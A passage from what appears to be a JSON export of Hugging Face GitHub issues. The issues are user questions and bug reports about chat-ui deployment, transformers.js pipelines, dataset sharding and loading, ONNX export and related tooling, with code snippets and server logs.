SetFitModel, Trainer, TrainingArguments\r\n\r\nfrom datasets import load_dataset\r\nfrom setfit.exporters.utils import mean_pooling\r\nfrom optimum.onnxruntime import ORTModelForFeatureExtraction, AutoOptimizationConfig, ORTOptimizer\r\nfrom transformers import AutoTokenizer\r\nfrom setfit.exporters.onnx import export_onnx\r\nimport onnxruntime\r\n\r\nmetric = evaluate.load(\"accuracy\")\r\ntrain_model = False\r\n\r\nclass PerformanceBenchmark:\r\n def __init__(self, model, dataset, optim_type):\r\n self.model = model\r\n self.dataset = dataset\r\n self.optim_type = optim_type\r\n\r\n def compute_accuracy(self):\r\n preds = self.model.predict(self.dataset[\"text\"])\r\n labels = self.dataset[\"label\"]\r\n accuracy = metric.compute(predictions=preds, references=labels)\r\n print(f\"Accuracy on test set - {accuracy['accuracy']:.3f}\")\r\n return accuracy\r\n\r\n def compute_size(self):\r\n state_dict = self.model.model_body.state_dict()\r\n tmp_path = Path(\"model.pt", "url": "https://github.com/huggingface/optimum/issues/1885", "state": "open", "labels": [ "bug" ], "created_at": "2024-06-02T22:34:37Z", "updated_at": "2024-06-08T03:02:40Z", "comments": 1, "user": "geraldstanje" }, { "repo": "huggingface/chat-ui", "number": 1241, "title": "\ud83d\udcbb\ud83d\udcbbHow to deploy to vercel", "body": "Hi,\r\n\r\nI am currently having troubles with deploying to Vercel, I am experiencing an error 404 NOT FOUND. I think i am using the wrong build command or the wrong default directory. 
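My current guess (untested; I'm assuming the `@sveltejs/adapter-vercel` package, since chat-ui is a SvelteKit app) is that the adapter needs to be swapped, something like:\r\n\r\n```js\r\n// svelte.config.js -- hypothetical sketch, not the shipped config\r\nimport adapter from '@sveltejs/adapter-vercel';\r\n\r\nexport default {\r\n  kit: {\r\n    adapter: adapter(), // produce build output Vercel can serve\r\n  },\r\n};\r\n```\r\n\r\n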
Can someone please help?\r\n\r\n![image](https://github.com/huggingface/chat-ui/assets/115069692/2f5bea8e-4907-41db-9639-82b17902fc7e)\r\n\r\n\r\nThank you!", "url": "https://github.com/huggingface/chat-ui/issues/1241", "state": "open", "labels": [ "support" ], "created_at": "2024-06-02T10:05:45Z", "updated_at": "2025-01-10T17:00:37Z", "user": "haydenkong" }, { "repo": "huggingface/transformers.js", "number": 788, "title": "Is it possible to use transformers.js to implement audio source separation tasks?", "body": "### Question\n\nHello, I have a beginner's question.\r\n\r\nI want to remove the human voice from the audio of a video and retain the background sound, in the browser. The idea is to load an audio source separation model with transformers.js, separate the background sound from the human voice, and then return only the background sound.\r\n\r\nBut I couldn't find relevant examples in the documentation, so I was wondering whether this can be implemented? If so, what are the learning or research paths?\r\n\r\nLooking forward to your reply", "url": "https://github.com/huggingface/transformers.js/issues/788", "state": "open", "labels": [ "question" ], "created_at": "2024-06-02T04:00:55Z", "updated_at": "2024-12-26T06:05:26Z", "user": "asasas234" }, { "repo": "huggingface/lerobot", "number": 238, "title": "How to use on WSL? Cannot visualize", "body": "How can I use this on WSL? I cannot visualize.", "url": "https://github.com/huggingface/lerobot/issues/238", "state": "closed", "labels": [ "simulation" ], "created_at": "2024-06-02T03:58:44Z", "updated_at": "2025-10-08T08:25:31Z", "user": "jackylee1" }, { "repo": "huggingface/chat-ui", "number": 1236, "title": "No Setup Deploy: Multiple models supported?", "body": "How can I make **multiple models** available on Chat UI using **No Setup Deploy**?\r\n\r\n## Further Details\r\n\r\nThe form (see below) seems to only allow one model.\r\n\r\n
[Screenshot of the deploy form]\r\n
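\r\nWhat I was hoping to end up with is an `.env.local` along these lines (hypothetical model names; the `MODELS` array format is the one used for self-hosted configs):\r\n\r\n```\r\nMODELS=`[\r\n  { \"name\": \"mistralai/Mistral-7B-Instruct-v0.2\" },\r\n  { \"name\": \"meta-llama/Meta-Llama-3-8B-Instruct\" }\r\n]`\r\n```\r\n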
\r\n\r\n## Tried so far\r\n\r\n(Without success)\r\n\r\n- I checked the [full tutorial](https://huggingface.co/docs/hub/spaces-sdks-docker-chatui#chatui-on-spaces) linked from the [README.md](https://github.com/huggingface/chat-ui/blob/93b39a0beb72378c76d5d146bfd3a8355c1d110d/README.md), but could find neither how to use multiple models nor a note about a limitation. \r\n- I tried deploying one model and adding an `.env.local` to the deployment on my space, but the web interface threw an error when trying to commit `.env.local` due to potential secrets included in the file.", "url": "https://github.com/huggingface/chat-ui/issues/1236", "state": "open", "labels": [ "enhancement", "docker" ], "created_at": "2024-06-01T11:41:22Z", "updated_at": "2024-06-03T07:55:12Z", "comments": 1, "user": "rodrigobdz" }, { "repo": "huggingface/optimum", "number": 1884, "title": "Add support for porting CLIPVisionModelWithProjection", "body": "### Feature request\n\nCurrently there is no support for porting CLIPVisionModelWithProjection class models from the transformers library to onnx through optimum. I'd like to add support for this, for which we'd need to change the optimum/exporters/onnx/model_configs.py file. I'd like to request your guidance on how to understand the code and build this feature.\n\n### Motivation\n\nI need this for a personal project and would be happy to contribute to the library as well.\n\n### Your contribution\n\nI would be happy to submit a PR", "url": "https://github.com/huggingface/optimum/issues/1884", "state": "open", "labels": [ "feature-request", "onnx" ], "created_at": "2024-05-31T22:25:45Z", "updated_at": "2024-10-09T07:56:28Z", "comments": 0, "user": "mr-sarthakgupta" }, { "repo": "huggingface/datasets", "number": 6940, "title": "Enable Sharding to Equal Sized Shards", "body": "### Feature request\r\n\r\nAdd an option when sharding a dataset to have all shards the same size. It would be good to provide both options: by duplication and by truncation.\r\n\r\n### Motivation\r\n\r\nCurrently the behavior of sharding is \"If n % i == l, then the first l shards will have length (n // i) + 1, and the remaining shards will have length (n // i).\". However, when using FSDP we want the shards to have the same size. This requires the user to handle this situation manually, but it would be nice to have an option to shard the dataset into equally sized shards. \r\n\r\n### Your contribution\r\n\r\nFor now, just a PR. I can also add code that does what is needed, though probably not efficiently.\r\nShard to equal size by duplication:\r\n```python\r\nremainder = len(dataset) % num_shards\r\nnum_missing_examples = num_shards - remainder\r\nduplicated = dataset.select(list(range(num_missing_examples)))\r\ndataset = concatenate_datasets([dataset, duplicated])\r\nshard = dataset.shard(num_shards, shard_idx)\r\n```\r\nOr by truncation:\r\n```python\r\nshard = dataset.shard(num_shards, shard_idx)\r\nnum_examples_per_shard = len(dataset) // num_shards\r\nshard = shard.select(list(range(num_examples_per_shard)))\r\n```", "url": "https://github.com/huggingface/datasets/issues/6940", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-05-31T21:55:50Z", "updated_at": "2024-06-01T07:34:12Z", "comments": 0, "user": "yuvalkirstain" }, { "repo": "huggingface/chat-ui", "number": 1225, "title": "SyntaxError: JSON5: invalid character 'u' at 1:1", "body": "Where can I find out more about the following error? 
Is there an issue with the existing template?\r\n\r\n## Reproduction Steps\r\n\r\n1. Deploy [Chat UI using default template](https://huggingface.co/new-space?template=huggingchat/chat-ui-template) with `MONGO_URL` set to `mongodb+srv://:@`\r\n2. Add secret called `HF_TOKEN` with access token value.\r\n\r\n## Error Logs\r\n\r\nAdditionally to https://github.com/huggingface/chat-ui/issues/1174, the following error is shown:\r\n\r\n```\r\n2024-05-30T11:56:43: PM2 log: [--no-daemon] Exit on target PM2 exit pid=403\r\n11:56:43 2|index | You have triggered an unhandledRejection, you may have forgotten to catch a Promise rejection:\r\n11:56:43 2|index | SyntaxError: JSON5: invalid character 'u' at 1:1\r\n11:56:43 2|index | at syntaxError (/app/node_modules/json5/lib/parse.js:1110:17)\r\n11:56:43 2|index | at invalidChar (/app/node_modules/json5/lib/parse.js:1055:12)\r\n11:56:43 2|index | at Object.value (/app/node_modules/json5/lib/parse.js:309:15)\r\n11:56:43 2|index | at lex (/app/node_modules/json5/lib/parse.js:100:42)\r\n11:56:43 2|index | at Object.parse (/app/node_modules/json5/lib/parse.js:25:17)\r\n11:56:43 2|index | at file:///app/build/server/chunks/auth-9412170c.js:28:16\r\n11:56:43 2|index | at ModuleJob.run (node:internal/modules/esm/module_job:222:25)\r\n11:56:43 2|index | at async ModuleLoader.import (node:internal/modules/esm/loader:316:24)\r\n11:56:43 2|index | at async Server.init (file:///app/build/server/index.js:4189:24)\r\n11:56:43 2|index | at async file:///app/build/handler.js:1140:1\r\n```\r\n\r\n
Full error log:\r\n
\r\n\r\n```\r\n===== Application Startup at 2024-05-30 09:52:12 =====\r\n\r\n2024-05-30T09:54:31.991512Z INFO text_generation_launcher: Args {\r\n model_id: \"mistralai/Mistral-7B-Instruct-v0.1\",\r\n revision: None,\r\n validation_workers: 2,\r\n sharded: None,\r\n num_shard: Some(\r\n 1,\r\n ),\r\n quantize: None,\r\n speculate: None,\r\n dtype: None,\r\n trust_remote_code: true,\r\n max_concurrent_requests: 128,\r\n max_best_of: 2,\r\n max_stop_sequences: 4,\r\n max_top_n_tokens: 5,\r\n max_input_tokens: None,\r\n max_input_length: None,\r\n max_total_tokens: None,\r\n waiting_served_ratio: 0.3,\r\n max_batch_prefill_tokens: None,\r\n max_batch_total_tokens: None,\r\n max_waiting_tokens: 20,\r\n max_batch_size: None,\r\n cuda_graphs: None,\r\n hostname: \"r-center-for-humans-and-machines-llm-stresstest-ubo8g-c2578-oc7\",\r\n port: 8080,\r\n shard_uds_path: \"/tmp/text-generation-server\",\r\n master_addr: \"localhost\",\r\n master_port: 29500,\r\n huggingface_hub_cache: Some(\r\n \"/data\",\r\n ),\r\n weights_cache_override: None,\r\n disable_custom_kernels: false,\r\n cuda_memory_fraction: 1.0,\r\n rope_scaling: None,\r\n rope_factor: None,\r\n json_output: false,\r\n otlp_endpoint: None,\r\n cors_allow_origin: [],\r\n watermark_gamma: None,\r\n watermark_delta: None,\r\n ngrok: false,\r\n ngrok_authtoken: None,\r\n ngrok_edge: None,\r\n tokenizer_config_path: None,\r\n disable_grammar_support: false,\r\n env: false,\r\n max_client_batch_size: 4,\r\n}\r\n2024-05-30T09:54:31.991620Z INFO hf_hub: Token file not found \"/home/user/.cache/huggingface/token\" \r\n2024-05-30T09:54:32.027992Z INFO text_generation_launcher: Default `max_input_tokens` to 4095\r\n2024-05-30T09:54:32.028013Z INFO text_generation_launcher: Default `max_total_tokens` to 4096\r\n2024-05-30T09:54:32.028016Z INFO text_generation_launcher: Default `max_batch_prefill_tokens` to 4145\r\n2024-05-30T09:54:32.028018Z INFO text_generation_launcher: Using default cuda graphs [1, 2, 4, 8, 16, 32]\r\n2024-05-30T09:54:32.028022Z WARN text_generation_launcher: `trust_remote_code` is set. Trusting that model `mistralai/Mistral-7B-Instruct-v0.1` do not contain malicious code.\r\n2024-05-30T09:54:32.028109Z INFO download: text_generation_launcher: Starting download process.\r\n{\"t\":{\"$date\":\"2024-05-30T11:54:32.245+02:00\"},\"s\":\"I\", \"c\":\"NETWORK\", \"id\":4915701, \"ctx\":\"main\",\"msg\":\"Initialized wire specification\",\"attr\":{\"spec\":{\"incomingExternalClient\":{\"minWireVersion\":0,\"maxWireVersion\":21},\"incomingInternalClient\":{\"minWireVersion\":0,\"maxWireVersion\":21},\"outgoing\":{\"minWireVersion\":6,\"maxWireVersion\":21},\"isInternalClient\":true}}}\r\n{\"t\":{\"$date\":\"2024-05-30T11:54:32.246+02:00\"},\"s\":\"I\", \"c\":\"CONTROL\", \"id\":23285, \"ctx\":\"main\",\"msg\":\"Automatically disabling TLS 1.0, to force-enable TLS 1.0 specify --sslDisabledProtocols 'none'\"}\r\n{\"t\":{\"$date\":\"2024-05-30T11:54:32.247+02:00\"},\"s\":\"I\", \"c\":\"NETWORK\", \"id\":4648601, \"ctx\":\"main\",\"msg\":\"Implicit TCP FastOpen unavailable. 
If TCP FastOpen is required, set tcpFastOpenServer, tcpFastOpenClient, and tcpFastOpenQueueSize.\"}\r\n{\"t\":{\"$date\":\"2024-05-30T11:54:32.248+02:00\"},\"s\":\"I\", \"c\":\"REPL\", \"id\":5123008, \"ctx\":\"main\",\"msg\":\"Successfully registered PrimaryOnlyService\",\"attr\":{\"service\":\"TenantMigrationDonorService\",\"", "url": "https://github.com/huggingface/chat-ui/issues/1225", "state": "open", "labels": [ "docker" ], "created_at": "2024-05-30T11:07:36Z", "updated_at": "2025-01-16T22:54:08Z", "comments": 8, "user": "rodrigobdz" }, { "repo": "huggingface/chat-ui", "number": 1221, "title": "500 Internal Server Error with chat-ui", "body": "I executed an inference server with the address http://192.168.0.185:7777/generate_stream using text-generation-inference (TGI) v.2.0.4. When executing commands with curl, the inference results are responding normally. For ease of use, I am going to use chat-ui. Below is the .env.local file's content of chat-ui. \r\n\r\n```\r\n$ vi .env.local\r\n 1 MONGODB_URL=mongodb://127.0.0.1:27017\r\n 2 HF_TOKEN=hf_***********************************\r\n 3 ALLOW_INSECURE_COOKIES=true\r\n 4 MODELS=`[\r\n 5 {\r\n 6 \"name\":\"samsung-codellama3-70b-custom\",\r\n 7 \"endpoints\":[{\"type\":\"tgi\",\"url\":\"http://192.168.0.185:7777/generate_stream\"}],\r\n 8 \"description\":\"A_Coding_Assistant_Model\",\r\n 9 \"userMessageToken\":\"<|prompter|>\",\r\n 10 \"assistantMessageToken\":\"<|assistant|>\",\r\n 11 \"messageEndToken\":\"\",\r\n 12 \"preprompt\":\"It_is_an_LLM-based_AI_assistant.\"',\r\n 13 \"parameters\":{\r\n 14 \"temperature\":0.2,\r\n 15 \"top_p\":0.9,\r\n 16 \"repetition_penalty\":1.2,\r\n 17 \"top_k\":10,\r\n 18 \"truncate\":1000,\r\n 19 \"max_new_tokens\":500\r\n 20 }\r\n 21 }\r\n 22 ]`\r\n```\r\n\r\n\r\nThen, I run `$ docker run -p 3000:3000 --env-file .env.local -v chat-ui:/data --name chat-ui ghcr.io/huggingface/chat-ui-db` command. Unfortunately, when I visited http://localhost:3000 with the MS Edge web browser, I got the error \u201c500: An error occurred\u201d as shown below. \r\n\r\n* Screenshot:\r\n![image](https://github.com/huggingface/chat-ui/assets/82404/6fec9357-8969-4b31-b657-a50bafad6114)\r\n\r\n* log message:\r\n`{\"level\":50,\"time\":1717033937576,\"pid\":30,\"hostname\":\"c5e9372bf1c1\",\"locals\":{\"sessionId\":\"f19bea94fb83ffe9b2aa5d9c3247d9dc1e819772e3b0b4557294cc9a7e884bf0\"},\"url\":\"http://localhost:3000/\",\"params\":{},\"request\":{},\"error\":{\"lineNumber\":1,\"columnNumber\":1},\"errorId\":\"7b3df79b-b4d0-4573-b92d-4ba0c182828b\"}`\r\n\r\nI am wondering what could be causing this error. Welcome to any hints to fix this issue.\r\n\r\n#### References\r\n* https://github.com/huggingface/chat-ui/issues?q=is%3Aissue+%22internal+server+error%22\r\n* https://github.com/huggingface/chat-ui/blob/main/src/lib/server/models.ts#L198\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1221", "state": "closed", "labels": [ "support" ], "created_at": "2024-05-30T00:35:58Z", "updated_at": "2024-05-31T00:19:49Z", "comments": 4, "user": "leemgs" }, { "repo": "huggingface/transformers.js", "number": 785, "title": "Using AutoModel, AutoTokenizer with distilbert models", "body": "### Question\n\nDoes transformers.js have a function to get the label after getting the logits? 
How to get the labels from the inference output?\r\n\r\nlet tokenizer = await AutoTokenizer.from_pretrained('distilbert-base-uncased-finetuned-sst-2-english');\r\nlet model = await AutoModel.from_pretrained('distilbert-base-uncased-finetuned-sst-2-english');\r\n\r\nlet inputs = await tokenizer('I love transformers!');\r\nlet { logits } = await model(inputs);", "url": "https://github.com/huggingface/transformers.js/issues/785", "state": "open", "labels": [ "question" ], "created_at": "2024-05-29T20:35:17Z", "updated_at": "2024-05-30T11:09:17Z", "user": "mram0509" }, { "repo": "huggingface/chat-ui", "number": 1220, "title": "A few questions about the Cloudflare integration", "body": "Howdy \ud83d\udc4b ,\r\n\r\nWorking on a corresponding page for this in the [Cloudflare docs](https://developers.cloudflare.com/workers-ai/) and had a few [questions that I need answered](https://github.com/cloudflare/cloudflare-docs/pull/14488#issuecomment-2101481990) in this PR.\r\n\r\n## Questions\r\n\r\n1. If I'm reading [this line](https://github.com/huggingface/chat-ui/blob/25d6df858f15128e6ca23214ce7ad08f176a68ed/src/lib/server/endpoints/cloudflare/endpointCloudflare.ts#L18C21-L18C29) correctly, it sounds like [their example is actually incorrect](https://github.com/huggingface/chat-ui/blob/main/README.md?plain=1#L598) and might need to be updated?\r\n2. If ^^^ is correct, does that mean that we should also be specifying the [`model` parameter](https://github.com/huggingface/chat-ui/blob/25d6df858f15128e6ca23214ce7ad08f176a68ed/src/lib/server/endpoints/cloudflare/endpointCloudflare.ts#L19) w/in the endpoint configuration?\r\n3. Correct assumption that this only works with models prefixed with `@hf`, think so based on [their code](https://github.com/huggingface/chat-ui/blob/25d6df858f15128e6ca23214ce7ad08f176a68ed/src/lib/server/endpoints/cloudflare/endpointCloudflare.ts#L19).\r\n\r\nMind helping me out so I can get this live in our docs?", "url": "https://github.com/huggingface/chat-ui/issues/1220", "state": "closed", "labels": [ "documentation" ], "created_at": "2024-05-29T19:11:14Z", "updated_at": "2024-06-20T12:53:52Z", "comments": 3, "user": "kodster28" }, { "repo": "huggingface/transformers.js", "number": 784, "title": "Shouldn't this work? #v3", "body": "### Question\n\n### Issue with Transformer.js v3 and WebGPU\r\n\r\n#### Description\r\nYesterday I installed `transformer.js` with the \"v3\" branch to test the new features with WebGPU, but I get an error.\r\n\r\n#### Error Message\r\n```\r\n@xenova_transformers.js?v=3b2ad0ed:24861 Uncaught (in promise)\r\nError: This pipeline is not yet supported in Transformers.js v3.\r\n```\r\n\r\n#### My code\r\n\r\n```javascript\r\nconst transcriber = await pipeline(\"automatic-speech-recognition\", \"Xenova/whisper-small.en\", {\r\n device: 'webgpu',\r\n dtype: 'fp32'\r\n});\r\n```\r\n\r\n#### Additional Information\r\nWith the following code, it works perfectly fine:\r\n\r\n```javascript\r\nconst extractor = await pipeline('feature-extraction', 'Xenova/all-MiniLM-L6-v2', {\r\n device: 'webgpu',\r\n dtype: 'fp32', // or 'fp16'\r\n});\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/784", "state": "open", "labels": [ "question" ], "created_at": "2024-05-29T13:36:52Z", "updated_at": "2024-05-29T14:59:49Z", "user": "kalix127" }, { "repo": "huggingface/datasets", "number": 6930, "title": "ValueError: Couldn't infer the same data file format for all splits. 
Got {'train': ('json', {}), 'validation': (None, {})}", "body": "### Describe the bug\n\nWhen I run the code en = load_dataset(\"allenai/c4\", \"en\", streaming=True), I encounter an error: raise ValueError(f\"Couldn't infer the same data file format for all splits. Got {split_modules}\") ValueError: Couldn't infer the same data file format for all splits. Got {'train': ('json', {}), 'validation': (None, {})}.\r\nHowever, running dataset = load_dataset('allenai/c4', streaming=True, data_files={'validation': 'en/c4-validation.00003-of-00008.json.gz'}, split='validation') works fine. What is the issue here?\n\n### Steps to reproduce the bug\n\nRun this code:\r\nimport os\r\nos.environ['HF_ENDPOINT'] = 'https://hf-mirror.com'\r\nfrom datasets import load_dataset\r\n\r\nen = load_dataset(\"allenai/c4\", \"en\", streaming=True)\n\n### Expected behavior\n\nSuccessfully loaded the dataset.\n\n### Environment info\n\n- `datasets` version: 2.18.0\r\n- Platform: Linux-6.5.0-28-generic-x86_64-with-glibc2.17\r\n- Python version: 3.8.19\r\n- `huggingface_hub` version: 0.22.2\r\n- PyArrow version: 15.0.2\r\n- Pandas version: 2.0.3\r\n- `fsspec` version: 2024.2.0\r\n", "url": "https://github.com/huggingface/datasets/issues/6930", "state": "open", "labels": [], "created_at": "2024-05-29T12:40:05Z", "updated_at": "2024-07-23T06:25:24Z", "comments": 2, "user": "Polarisamoon" }, { "repo": "huggingface/datasets", "number": 6929, "title": "Avoid downloading the whole dataset when only README.md has been touched on the hub.", "body": "### Feature request\r\n\r\n`datasets.load_dataset()` triggers a new download of the **whole dataset** when the README.md file has been touched on huggingface hub, even if the data files / parquet files are exactly the same.\r\n\r\nI think the current re-download behaviour of the load_dataset function is triggered whenever the hash of the latest commit on huggingface hub changes, but is there a clever way to download the dataset again **if and only if** the data is modified? \r\n\r\n### Motivation\r\n\r\nThe current behaviour is a waste of network bandwidth / disk space / research time.\r\n\r\n### Your contribution\r\n\r\nI don't have time to submit a PR, but I hope a simple solution will emerge from this issue! ", "url": "https://github.com/huggingface/datasets/issues/6929", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-05-29T10:36:06Z", "updated_at": "2024-05-29T20:51:56Z", "comments": 2, "user": "zinc75" }, { "repo": "huggingface/candle", "number": 2226, "title": "How to load LoRA adapter along with the GGUF model?", "body": "Hello all,\r\n\r\nI have recently managed to convert the flan-t5 base model to GGUF (#2215). But I also have multiple LoRA adapters trained for different tasks. \r\n\r\n@EricLBuehler @LaurentMazare So I wish to know if there is a way to also load single/multiple LoRA adapters along with the GGUF model. I am currently running inference using the following command:\r\n```bash\r\ncargo run --example quantized-t5 --release -- --weight-file \"flant5large_f16.gguf\" \\\r\n--config-file \"flan-t5-large/config.json\" \\\r\n--prompt \"Make this text coherent: Their flight is weak. 
They run quickly through the tree canopy.\"\r\n```\r\nBut I have the adapter as (adapter_model.bin and adapter_config.json), which I would like load along with this model **Without Weight Merging**.", "url": "https://github.com/huggingface/candle/issues/2226", "state": "open", "labels": [], "created_at": "2024-05-29T06:03:10Z", "updated_at": "2024-06-05T03:34:14Z", "user": "niranjanakella" }, { "repo": "huggingface/transformers.js", "number": 781, "title": "Progress callback for Moondream?", "body": "### Question\r\n\r\nWhile implementing Moondream (from the excellent example) I stumbled upon a few questions.\r\n\r\n- How can I implement a callback while Moondream is generating tokens? A normal progressCallback didn\u2019t work?\r\n\r\n```\r\nself.model.generate({\r\n\t...text_inputs,\r\n\t...vision_inputs, \r\n\tdo_sample: false,\r\n\tmax_new_tokens: 500,\r\n\r\n\tprogress_callback: (progress_data) => {\r\n\t\tconsole.log(\"progress_data: \", progress_data);\r\n\t\tif (progress_data.status !== 'progress') return;\r\n\t\tself.postMessage(progress_data);\r\n\t},\r\n})\r\n```\r\nI\u2019ve also tried the new CallbackStreamer option, but that had no effect either.\r\n\r\nFrom the [demo](https://github.com/xenova/transformers.js/issues/743) I know it should be possible. But I [couldn't find the source code](https://github.com/xenova/transformers.js/tree/v3) for it (yet). And trying to learn anything from the demo as-is was, well, difficult with all that [minifying](https://xenova-experimental-moondream-webgpu.static.hf.space/assets/worker-DHaYXnZx.js) and framework stuff.\r\n\r\n- Is this warning in the browser console anything to worry about?\r\n```\r\nThe number of image tokens was not set in the model configuration. Setting it to the number of features detected by the vision encoder (729).models.js:3420 \r\n```\r\n\r\n\r\n- What would be the effect of changing these values? E.g. what would be the expected outcome of changing decoder_model_merged from from q4 to q8?\r\n```\r\nembed_tokens: 'fp16',\r\nvision_encoder: 'q8', // or 'fp16'\r\ndecoder_model_merged: 'q4', // or 'q8'\r\n```\r\n\r\n- What's the difference between Moondream and [NanoLlava](https://huggingface.co/spaces/Xenova/experimental-nanollava-webgpu)? When should I use one over the other?", "url": "https://github.com/huggingface/transformers.js/issues/781", "state": "closed", "labels": [ "question" ], "created_at": "2024-05-28T14:07:07Z", "updated_at": "2024-06-03T18:49:10Z", "user": "flatsiedatsie" }, { "repo": "huggingface/competitions", "number": 29, "title": "How to notify awardees or contact participants\uff1f", "body": "The competition just shows the participants' id. \r\n\r\nSo, how to contact them via email to inform them of the award requirements and request additional personal information?", "url": "https://github.com/huggingface/competitions/issues/29", "state": "closed", "labels": [], "created_at": "2024-05-28T08:11:38Z", "updated_at": "2024-06-09T07:03:25Z", "user": "shangfenghuang" }, { "repo": "huggingface/datatrove", "number": 196, "title": "How to deduplicate multiple datasets?", "body": "fineweb offer a deduplication demo for one dump. 
If I want to deduplicate more dumps, should I merge the dumps before deduplication?\r\n", "url": "https://github.com/huggingface/datatrove/issues/196", "state": "closed", "labels": [], "created_at": "2024-05-28T03:00:31Z", "updated_at": "2024-06-07T07:25:45Z", "user": "canghaiyunfan" }, { "repo": "huggingface/chat-ui", "number": 1183, "title": "Prompt template for WizardLM-2-8x22B?", "body": "What is the prompt template for `WizardLM-2-8x22B` in the `.env.local`?\r\n\r\nWhen setting it to the default one: `{{#each messages}}{{#ifUser}}[INST] {{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}} [/INST]{{/ifUser}}{{#ifAssistant}}{{content}}{{/ifAssistant}}{{/each}}` \r\n\r\nthe generated output is very odd and incoherent. \r\n\r\nWhen setting the prompt template to the one displayed in the [model card](https://huggingface.co/bartowski/WizardLM-2-8x22B-GGUF): `{system_prompt} USER: {prompt} ASSISTANT: ` \r\n\r\nthe output gets even worse.\r\n\r\nCan anyone help?\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1183", "state": "open", "labels": [ "support", "models" ], "created_at": "2024-05-27T14:28:47Z", "updated_at": "2024-07-29T15:27:25Z", "comments": 3, "user": "Arche151" }, { "repo": "huggingface/chat-ui", "number": 1178, "title": "Improve Domain Search Results for Assistants", "body": "The domain search for assistants is a great idea, but the current implementation is not really useful for domains that, unlike Wikipedia, are less likely to appear among the top results.\r\nThis seems to happen because the web is searched first, and the domain filter is applied afterward. This method can easily result in zero parseable results (especially because PDF parsing is currently not available).\r\n\r\nProposed solution: Change the implementation so that the search process continues until at least one parseable result is found. To avoid excessive searching, an upper limit on the number of pages to be searched makes sense (e.g. at 100), but it should definitely be more than the current limit of 8 pages.", "url": "https://github.com/huggingface/chat-ui/issues/1178", "state": "open", "labels": [ "question", "websearch" ], "created_at": "2024-05-27T10:33:22Z", "updated_at": "2024-05-31T11:02:11Z", "user": "lueschow" }, { "repo": "huggingface/datatrove", "number": 195, "title": "What is the difference between tasks and workers?", "body": "What is the difference between tasks and workers? What is the definition of a task, and how do I determine the number of tasks?\r\n\r\n\r\n\r\n", "url": "https://github.com/huggingface/datatrove/issues/195", "state": "closed", "labels": [], "created_at": "2024-05-27T06:32:25Z", "updated_at": "2024-05-27T07:08:11Z", "user": "canghaiyunfan" }, { "repo": "huggingface/transformers.js", "number": 778, "title": "Pipeline execution time with 'image-classification' pipeline", "body": "### Question\n\nWhen calling the 'image-classification' pipeline we pass the image URL, so the pipeline fetches the image itself. Will the time taken to process the image therefore include the image's download time? If the network is slow, this may impact pipeline performance. Is there a way to use an image that's already been downloaded by the webpage for an image element? 
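Something like the following is what I have in mind (an untested sketch; I'm assuming `RawImage.fromBlob` exists and that the pipeline accepts a `RawImage` directly):\r\n\r\n```js\r\nimport { pipeline, RawImage } from '@xenova/transformers';\r\n\r\nconst classifier = await pipeline('image-classification');\r\n\r\n// Re-use an <img> the page already downloaded -- no second network fetch\r\nconst img = document.getElementById('photo'); // hypothetical element id\r\nconst canvas = document.createElement('canvas');\r\ncanvas.width = img.naturalWidth;\r\ncanvas.height = img.naturalHeight;\r\ncanvas.getContext('2d').drawImage(img, 0, 0);\r\n\r\nconst blob = await new Promise((resolve) => canvas.toBlob(resolve));\r\nconst output = await classifier(await RawImage.fromBlob(blob));\r\n```\r\n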
", "url": "https://github.com/huggingface/transformers.js/issues/778", "state": "open", "labels": [ "question" ], "created_at": "2024-05-26T20:15:21Z", "updated_at": "2024-05-27T04:14:52Z", "user": "mram0509" }, { "repo": "huggingface/transformers", "number": 31039, "title": "What if past_key_values is in model_kwargs but is None", "body": "https://github.com/huggingface/transformers/blob/4c6c45ba138202f42582b5cea98126af87195a95/src/transformers/generation/utils.py#L1317\r\n\r\nThis line fails for me when past_key_values is in model_kwargs but is None. Line 1321 raises an error \r\nCould you advice?\r\n\r\nThank you", "url": "https://github.com/huggingface/transformers/issues/31039", "state": "closed", "labels": [], "created_at": "2024-05-26T07:58:18Z", "updated_at": "2024-06-10T06:32:23Z", "user": "estelleafl" }, { "repo": "huggingface/chat-ui", "number": 1174, "title": "Unable to deploy space with chatUI, getting error ** Failed to connect to 127.0.0.1 port 8080 after 0 ms**", "body": "Hi guys, so i am trying to deploy space with chatui template and **abacusai/Smaug-Llama-3-70B-Instruct** model but i am getting following error again and again in container logs.\r\n\r\n`\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Connection refused\r\nWarning: Problem : connection refused. Will retry in 10 seconds. 40 retries \r\nWarning: left.\r\n2024-05-26T07:02:16.945294Z INFO text_generation_launcher: Downloaded /data/models--abacusai--Smaug-Llama-3-70B-Instruct/snapshots/fbaa713bdcdc2a2f85bbbe5808ec7046700a36e5/model-00007-of-00030.safetensors in 0:00:29.\r\n2024-05-26T07:02:16.945393Z INFO text_generation_launcher: Download: [7/30] -- ETA: 0:10:47.285711\r\n2024-05-26T07:02:16.945714Z INFO text_generation_launcher: Download file: model-00008-of-00030.safetensors\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Connection refused\r\nWarning: Problem : connection refused. Will retry in 10 seconds. 39 retries \r\nWarning: left.\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Connection refused\r\nWarning: Problem : connection refused. Will retry in 10 seconds. 38 retries \r\nWarning: left.\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Connection refused\r\nWarning: Problem : connection refused. Will retry in 10 seconds. 37 retries \r\nWarning: left.\r\n2024-05-26T07:02:47.664282Z INFO text_generation_launcher: Downloaded /data/models--abacusai--Smaug-Llama-3-70B-Instruct/snapshots/fbaa713bdcdc2a2f85bbbe5808ec7046700a36e5/model-00008-of-00030.safetensors in 0:00:30.\r\n2024-05-26T07:02:47.664376Z INFO text_generation_launcher: 